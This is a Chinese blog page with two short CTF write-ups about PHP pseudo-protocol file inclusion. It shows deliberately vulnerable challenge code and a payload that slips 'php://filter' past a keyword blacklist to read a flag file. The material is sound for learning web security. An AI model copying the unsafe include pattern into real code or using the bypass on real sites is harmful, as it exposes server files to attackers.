2020-12-06 /2020/12/06/伪协议2/ 99+ 1 分钟 0.1 k

伪协议2

1.题目

<?php
error_reporting(0);
echo '<center><strong>针不戳，吃柠檬的感觉针不戳</strong></center>';
highlight_file(__FILE__);
$file=$_GET['file'];
if (isset($file)){
    if(preg_match('/php|file|zip|bzip|zlib|base|data/i',$file)){
        echo ('hacker!!!');
    }else {
        $a=str_replace("troye","",$file);
        include $a;
    }
}
#不对劲，总感觉写错了啥，算了,继续吃柠檬~

2.过程

这次是大写也过滤了，没辙了……

但是下面又有了新语句，$a=str_replace(“troye”,””,$file);

检测troye并从字符串中去掉，把troye混进去就可以绕过了。

payload：?file=PHtroyeP://filter/read=convert.BAStroyeE64-encode/resource=flag

em，没了

WEB

伪协议

2020-12-06 /2020/12/06/伪协议1/ 99+ 2 分钟 0.3 k

伪协议1

1.题目

<?php
error_reporting(0);
echo '<center><strong>针不戳，吃柠檬的感觉针不戳</strong></center>';
highlight_file(__FILE__);
$file=$_GET['file'];
if (isset($file)){
    if(preg_match('/php|file|zip|bzip|zlib|base|data/',$file)){
        echo ('hacker!!!');
    }else {
        include $file;
    }
}
#不对劲，总感觉写错了啥，算了，先去吃柠檬~
?>

WEB

伪协议

2020-12-06

伪协议2

1.题目

2.过程

伪协议1

1.题目

链接

最新文章

分类

归档

标签

订阅更新